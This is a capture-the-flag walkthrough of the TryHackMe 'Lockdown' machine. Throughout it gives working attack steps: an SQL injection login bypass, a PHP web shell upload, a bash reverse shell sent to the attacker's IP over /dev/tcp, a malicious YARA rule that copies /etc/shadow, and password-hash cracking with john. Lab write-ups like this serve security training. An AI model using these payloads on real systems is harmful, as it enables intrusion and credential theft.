Lockdown - THM

October 07, 2021

Tags: | web | linux | red |

Read this in "about 5 minutes".

Summary

We will retain the intial access by abusing the SQL injection vulnerability to bypass authentication and upload a PHP reverse shell. Enumerating the target system locally, we discover that cyrus user reuses the password stored in a config file, which we will use to compromise cyrus shell access. Finally, privilege escalation can be achieved via injecting clamscan’s rules.

Exploitation

SQL Injection

Navigate to the admin page at http://contacttracer.thm/admin/login.php, we are prompted to login.

Trying some basic credentials: admin:admin, root:toor, and admin:password but none of them works out, we come up with an idea of using sql injection …

Payload: 1' or 1=1-- -, then Sign In.

And we successfully bypassed the authentication prompt!.

(More information about the vulnerability can be found here.)

After landing on the Admin Panel, we then navigate to the following URL: http://contacttracer.thm/admin/?page=system_info.

PHP Shell Upload

Now we prepare a cmback.php file with the following contents:

<?php system($_GET['cmd']; ?>

After the file is ready, we upload it onto the target server (?page=system_info) → click on Update …

Intercept the traffic with Burp → modify the file type as below.

then Forward the traffic.

Once the file is successfully uploaded, we logout and go to the URL: http://contacttracer.thm/login.php.

Open web developer tool (Ctrl + Shift + I) → Network tab → we should see the location of the PHP file we have uploaded.

Let us try to trigger the shell with curl.

curl -s http://contacttracer.thm/uploads/1633297860_test.png.php\?cmd=whoami --output -                                                                                              23 ⨯
PNG

IHDPN   pHYs

            tIME(e\tEXtCommentCreated with The GIMPd%eIDATxKL]@܌DF.F&*B1ոQ"`+BJ
www-data

and we have code execution!.

Now, it is easy to pull a bash reverse shell.

$ curl -s http://contacttracer.thm/uploads/1633297860_test.png.php\?cmd=bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.4.1.61%2F80+0%3E%261%22

$ nc -nlvp 80                     
listening on [any] 80 ...
connect to [10.4.1.61] from (UNKNOWN) [10.10.139.26] 54572
bash: cannot set terminal process group (1046): Inappropriate ioctl for device
bash: no job control in this shell
www-data@lockdown:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

Shell as `cyrus`

Enumerating the system divulges a plaintext password stored in a config file.

Combine the password with each system user, we discover sweetpandemonium let us in as cyrus.

www-data@lockdown:/var/www/html/uploads$ su cyrus
Password: sweetpandemonium
cyrus@lockdown:~$ 

With cyrus shell, we can execute the following sudo command:

cyrus@lockdown:~$ sudo -l
[sudo] password for cyrus: 
Matching Defaults entries for cyrus on lockdown:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cyrus may run the following commands on lockdown:
    (root) /opt/scan/scan.sh

System compromised

After conducting a few investigations, we realized that the directory /var/lib/clamav/ is world-writable, which is also where the rules for clamav are defined.

Our goal is writting a YARA rule to flag the /etc/shadow file as malicious, the file is then copied to the /quarantine directory and is only accessible by us.

To do that, we first prepare a .yara rule:

cyrus@lockdown:~$ cat /var/lib/clamav/root.yara 
rule root_txt
{
        strings:
                $a = "www-data:*:"
        condition:
                $a
}

Basically, the rule will look for any file with the content www-data:*: and mark it as malicious.

Once we trigger the rule …

cyrus@lockdown:~$ sudo /opt/scan/scan.sh                                                        
[sudo] password for cyrus: 
Enter path: /etc   
/etc/ld.so.cache: OK                        
/etc/manpath.config: OK
/etc/rsyslog.conf: OK
...
----------- SCAN SUMMARY -----------
Known viruses: 2
Engine version: 0.103.2
Scanned directories: 1
Scanned files: 83
Infected files: 4
Data scanned: 0.23 MB
Data read: 0.12 MB (ratio 1.97:1)
Time: 0.080 sec (0 m 0 s)
Start Date: 2021:10:04 01:04:25
End Date:   2021:10:04 01:04:25

the /etc/shadow file is copied to ~/quarantine/shadow.

Here is the content of the shadow file.

cyrus@lockdown:~$ cat quarantine/shadow
...
maxine:$6$/syu6s6/$Z5j6C61vrwzvXmFsvMRzwNYHO71NSQgm/z4cWQpDxMt3JEpT9FvnWm4Nuy.xE3xCQHzY3q9Q4lxXLJyR1mt320:18838:0:99999:7:::
...

We can crack the hash locally employed tools called unshadow & john:

$ unshadow maxine_passwd maxine_shadow > maxine_pass 
$ john --wordlist=/usr/share/wordlists/rockyou.txt maxine_pass
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tiarna           (maxine)
1g 0:00:00:17 DONE (2021-10-03 21:10) 0.05767g/s 4665p/s 4665c/s 4665C/s 070196..skyline123
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With the cracked password, we can access maxine shell and run any sudo command as root!.

cyrus@lockdown:~$ su maxine
Password: tiarna
maxine@lockdown:/home/cyrus$ sudo su -
root@lockdown:~# id
uid=0(root) gid=0(root) groups=0(root)

Home